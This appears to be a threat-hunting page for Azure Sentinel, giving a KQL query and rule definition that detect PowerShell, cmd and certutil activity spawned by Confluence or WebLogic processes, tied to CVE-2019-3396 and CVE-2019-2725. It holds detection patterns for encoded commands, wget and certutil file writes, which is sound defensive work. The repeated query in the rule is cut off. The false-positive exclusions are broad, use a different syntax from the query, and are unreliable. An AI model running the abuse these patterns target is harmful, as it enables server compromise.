confluence-weblogic-targeted

Hunt Hypothesis

Adversaries may be leveraging compromised Confluence Server instances to exfiltrate data or establish persistence through WebLogic vulnerabilities. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect and mitigate potential targeted attacks against critical infrastructure.

KQL Query

DeviceProcessEvents
| where Timestamp >= ago(7d)
| where 
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe" or 
InitiatingProcessFileName == "beasvc.exe" 
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"), 
Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total) 
| where
(
    FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
    // Omit known clean processes
    and ProcessCommandLine !startswith "POWERSHELL.EXE  -C \"GET-WMIOBJECT -COMPUTERNAME"
    and ProcessCommandLine !contains "ApplicationNo"
    and ProcessCommandLine !contains "CustomerGroup"
    and ProcessCommandLine !contains "Cosmos"
    and ProcessCommandLine !contains "Unrestricted"
    and
    (
        ProcessCommandLine contains "$" // PowerShell variable declaration
        or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
        or ProcessCommandLine contains "encodedcommand"
        or ProcessCommandLine contains "wget"
        //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
    )
)
or
(
    FileName =~ "cmd.exe" // cmd.exe is spawned
    and ProcessCommandLine contains "@echo" and 
    ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
    FileName =~ "certutil.exe" // CertUtil.exe abuse
    and ProcessCommandLine contains "-split" 
    // the "-split" parameter is required to write files to the disk
)
| project
       Timestamp,
       InitiatingProcessCreationTime ,
       DeviceId ,
       Grandparent_PID = InitiatingProcessParentId,
       Grandparent = InitiatingProcessParentFileName,
       Parent_Account = InitiatingProcessAccountName,
       Parent_PID = InitiatingProcessId,
       Parent = InitiatingProcessFileName ,
       Parent_Commandline = InitiatingProcessCommandLine,
       Child_PID = ProcessId,
       Child = FileName ,
       Child_Commandline = ProcessCommandLine

Analytic Rule Definition

id: 8b8be25f-1bc0-4d57-81a7-76ef97f1d64f
name: confluence-weblogic-targeted
description: |
  This query was originally published in the threat analytics report, Confluence and WebLogic abuse.
  2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities.
  The campaigns have specifically targeted:
  1. CVE-2019-3396 - Software update
  2. CVE-2019-2725 - Software update
  The following query detects activity broadly associated with these campaigns.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
tactics:
- Vulnerability
query: |
  DeviceProcessEvents
  | where Timestamp >= ago(7d)
  | where 
  // "Grandparent" process is Oracle WebLogic or some process loading Confluence
  InitiatingProcessParentFileName == "beasvc.exe" or 
  InitiatingProcessFileName == "beasvc.exe" 
  or InitiatingProcessCommandLine contains "//confluence"
  // Calculate for Base64 in Commandline
  | extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"), 
  Total = countof(ProcessCommandLine, ".", "regex")
  | extend Ratio = todouble(Caps) / todouble(Total) 
  | where
  (
      FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
      // Omit known clean processes
      and ProcessCommandLine !startswith "POWERSHELL.EXE  -C \"GET-WMIOBJECT -COMPUTERNAME"
      and ProcessCommandLine !contains "ApplicationNo"
      and ProcessCommandLine !contains "CustomerGroup"
      and ProcessCommandLine !contains "Cosmos"
      and ProcessCommandLine !contains "Unrestricted"
      and
      (
          ProcessCommandLine contains "$" // PowerShell variable declaration
          or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
          or ProcessCommandLine contains "encodedcommand"
          or ProcessCommandLine contains "wget"
          //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
      )
  )
  or
  (
      FileName =~ "cmd.exe" // cmd.exe is spawned
      and ProcessCommandLine contains "@echo" and 
      ProcessCommandLine contains ">" // Echoing commands into a file
  )
  or
  (
      FileName =~ "certutil.exe" // CertUtil.exe abuse
      and ProcessCommandLine contains "-split" 
      // the "-split" parameter is required to write files to the disk
  )
  | project
         Timestamp,
         InitiatingProcessCreationTime ,
         DeviceId ,
         Grandparent_PID = InitiatingProcessParentId,
         Grandparent = InitiatingProcessParentFileName,
         Parent_Account = InitiatingProcessAccountName,
         Parent_PID = InitiatingProcessId,
         Parent = InitiatingProcessFileName ,
         Parent_Commandline = InitiatingProcessCommandLine,
         Child_PID = ProcessId,
         Child = FileName ,
         Child_Commandline = Pr

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

MITRE ATT&CK Context

Tactic: Vulnerability

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Campaigns/confluence-weblogic-targeted.yaml)

False Positive Guidance

Scenario: Scheduled Backup Job Execution
Description: A legitimate scheduled backup job runs on a Confluence instance, which may trigger the rule due to similar network activity or process execution patterns.
Filter/Exclusion: process.name:*backup* OR process.args:*backup* OR process.parent.name:confluence*
Scenario: Admin Task - Content Migration
Description: An administrator is performing a content migration between Confluence instances, which may involve similar HTTP requests or file transfers that match the rule’s logic.
Filter/Exclusion: process.name:confluence* AND process.args:*migrate* OR process.args:*import*
Scenario: WebLogic Server Maintenance Task
Description: A system administrator is performing routine maintenance on a WebLogic server, which may involve similar network traffic or command execution patterns.
Filter/Exclusion: process.name:java AND process.args:*WebLogic* AND process.args:*maintenance*
Scenario: Automated Report Generation via Confluence
Description: A scheduled report generation task in Confluence uses a third-party tool like Jenkins or Apache NiFi to pull data and generate reports, which could trigger the rule due to similar process or network behavior.
Filter/Exclusion: process.name:jenkins* OR process.name:apache-nifi* OR process.args:*report*
Scenario: Legitimate Use of Confluence API for Automation
Description: A DevOps team is using the Confluence REST API (e.g., via Postman, curl, or Python scripts) to automate documentation updates or task tracking, which may resemble malicious activity.
Filter/Exclusion: process.name:curl* OR process.name:python*